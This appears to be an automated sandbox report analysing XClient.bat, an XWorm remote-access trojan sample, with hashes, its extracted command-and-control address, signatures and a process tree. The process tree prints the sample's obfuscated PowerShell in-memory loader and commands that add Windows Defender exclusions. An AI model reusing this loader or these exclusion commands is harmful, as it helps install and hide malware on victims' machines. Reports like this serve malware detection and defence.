Analysis
-
max time kernel
98s -
max time network
151s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
18-11-2024 21:25
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
XClient.bat
-
Size
66KB
-
MD5
ded6a5751236497347ed27d22226ef8d
-
SHA1
be89ce17f8dade3336202acc0b7ac78d3f9dbdca
-
SHA256
713b3b9b9cd5a6c17626b7f31a8173f5b397db4ea0d986114524fd988803f4f2
-
SHA512
8356eacb14d0cb5e552d383e6a5afe0873b1de2b9f002f743bd7d7aee50748011406964407e0ea0a3e04e03677410785cd385c72d88a10ced33d9315ba427ef4
-
SSDEEP
1536:iZAamnjGVMuIfaG8PUTjSQ3qYZmdN+p6CjQU+n2S+9Kh:WAamjVuWLTjR6YZ2Ip6CjQUo2SMQ
Malware Config
Extracted
xworm
name-hundred.gl.at.ply.gg:10055
-
install_file
Windows.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4128-16-0x0000020FC6150000-0x0000020FC6166000-memory.dmp family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3900 powershell.exe 2520 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation XClient.bat.exe -
Executes dropped EXE 1 IoCs
pid Process 4128 XClient.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2620 timeout.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4128 XClient.bat.exe 4128 XClient.bat.exe 3900 powershell.exe 3900 powershell.exe 2520 powershell.exe 2520 powershell.exe 4128 XClient.bat.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeDebugPrivilege 4128 XClient.bat.exe Token: SeDebugPrivilege 3900 powershell.exe Token: SeIncreaseQuotaPrivilege 3900 powershell.exe Token: SeSecurityPrivilege 3900 powershell.exe Token: SeTakeOwnershipPrivilege 3900 powershell.exe Token: SeLoadDriverPrivilege 3900 powershell.exe Token: SeSystemProfilePrivilege 3900 powershell.exe Token: SeSystemtimePrivilege 3900 powershell.exe Token: SeProfSingleProcessPrivilege 3900 powershell.exe Token: SeIncBasePriorityPrivilege 3900 powershell.exe Token: SeCreatePagefilePrivilege 3900 powershell.exe Token: SeBackupPrivilege 3900 powershell.exe Token: SeRestorePrivilege 3900 powershell.exe Token: SeShutdownPrivilege 3900 powershell.exe Token: SeDebugPrivilege 3900 powershell.exe Token: SeSystemEnvironmentPrivilege 3900 powershell.exe Token: SeRemoteShutdownPrivilege 3900 powershell.exe Token: SeUndockPrivilege 3900 powershell.exe Token: SeManageVolumePrivilege 3900 powershell.exe Token: 33 3900 powershell.exe Token: 34 3900 powershell.exe Token: 35 3900 powershell.exe Token: 36 3900 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeIncreaseQuotaPrivilege 2520 powershell.exe Token: SeSecurityPrivilege 2520 powershell.exe Token: SeTakeOwnershipPrivilege 2520 powershell.exe Token: SeLoadDriverPrivilege 2520 powershell.exe Token: SeSystemProfilePrivilege 2520 powershell.exe Token: SeSystemtimePrivilege 2520 powershell.exe Token: SeProfSingleProcessPrivilege 2520 powershell.exe Token: SeIncBasePriorityPrivilege 2520 powershell.exe Token: SeCreatePagefilePrivilege 2520 powershell.exe Token: SeBackupPrivilege 2520 powershell.exe Token: SeRestorePrivilege 2520 powershell.exe Token: SeShutdownPrivilege 2520 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe Token: SeSystemEnvironmentPrivilege 2520 powershell.exe Token: SeRemoteShutdownPrivilege 2520 powershell.exe Token: SeUndockPrivilege 2520 powershell.exe Token: SeManageVolumePrivilege 2520 powershell.exe Token: 33 2520 powershell.exe Token: 34 2520 powershell.exe Token: 35 2520 powershell.exe Token: 36 2520 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4128 XClient.bat.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3752 wrote to memory of 4128 3752 cmd.exe 84 PID 3752 wrote to memory of 4128 3752 cmd.exe 84 PID 4128 wrote to memory of 3900 4128 XClient.bat.exe 90 PID 4128 wrote to memory of 3900 4128 XClient.bat.exe 90 PID 4128 wrote to memory of 2520 4128 XClient.bat.exe 93 PID 4128 wrote to memory of 2520 4128 XClient.bat.exe 93 PID 4128 wrote to memory of 4304 4128 XClient.bat.exe 99 PID 4128 wrote to memory of 4304 4128 XClient.bat.exe 99 PID 4304 wrote to memory of 2620 4304 cmd.exe 101 PID 4304 wrote to memory of 2620 4304 cmd.exe 101
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\XClient.bat.exe"XClient.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $MACmm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($ctUEx in $MACmm) { if ($ctUEx.StartsWith(':: ')) { $WrLPu = $ctUEx.Substring(3); break; }; };$rNiyV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($WrLPu);$dKTzZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O3DlLOZ1HoqoHUXVbXCi17PqHhkd750PUh0uxdCau4Y=');for ($i = 0; $i -le $rNiyV.Length - 1; $i++) { $rNiyV[$i] = ($rNiyV[$i] -bxor $dKTzZ[$i % $dKTzZ.Length]); };$HeEGM = New-Object System.IO.MemoryStream(, $rNiyV);$zLsAA = New-Object System.IO.MemoryStream;$Vwwuc = New-Object System.IO.Compression.GZipStream($HeEGM, [IO.Compression.CompressionMode]::Decompress);$Vwwuc.CopyTo($zLsAA);$Vwwuc.Dispose();$HeEGM.Dispose();$zLsAA.Dispose();$rNiyV = $zLsAA.ToArray();$lapFA = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($rNiyV);$JOwJF = $lapFA.EntryPoint;$JOwJF.Invoke($null, (, [string[]] ('')))2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.bat'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.bat.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp482F.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:2620
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD50ed03408b8364233c14892a8144b1076
SHA1d1546c466c467a49b10579f0601467490abc01e5
SHA256abc89e178dd318007ff51ee97a3f0741c5fa7c7f6cbf4643a8fc6fbe214eb624
SHA51210db8f0e279f7d4cebfb09360fcf1d0995ea627e48e04b4ed7a252b875f4aa608dd751fceff122c380ee2cb5575af9f81bd48e3e5bca2e77b0c663d2a7d5384a
-
Filesize
1KB
MD5a11f87b8cd1fe31e813554148961c1e2
SHA1196e7db1115913a69bc1fc5f195bc3c5b6cd448a
SHA2567e9f295821a7d67bb2a4eb7653e5288f9ea83c333db95398f72b914a59afb083
SHA5125509a66bdfd4e935c77ec2cf92b0fe998d7aa013c9cc9399b532db5d266d08314abd0afa6d08c14475e6badea92ef1d62e21999e489eb9d95e59006e786763b9
-
Filesize
445KB
MD52e5a8590cf6848968fc23de3fa1e25f1
SHA1801262e122db6a2e758962896f260b55bbd0136a
SHA2569785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3
SHA5125c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
163B
MD5c5c34d4b06c80bde8531ebdad9cdc7cd
SHA1bda217c767eda5cc1c6aaa78464b531e39f8853b
SHA256dbb3765e529fc27aba60e7293ccf84421091ba151ba3dd98aaa8a0a3534d02d6
SHA51210e12575c1600ba67fa030afdc740522e54e61fd718ebf8199bfdcec304f4846e9ebf7f03ca821dff6f155ca62ea16f937841b60ca2f45903218e19312aa2297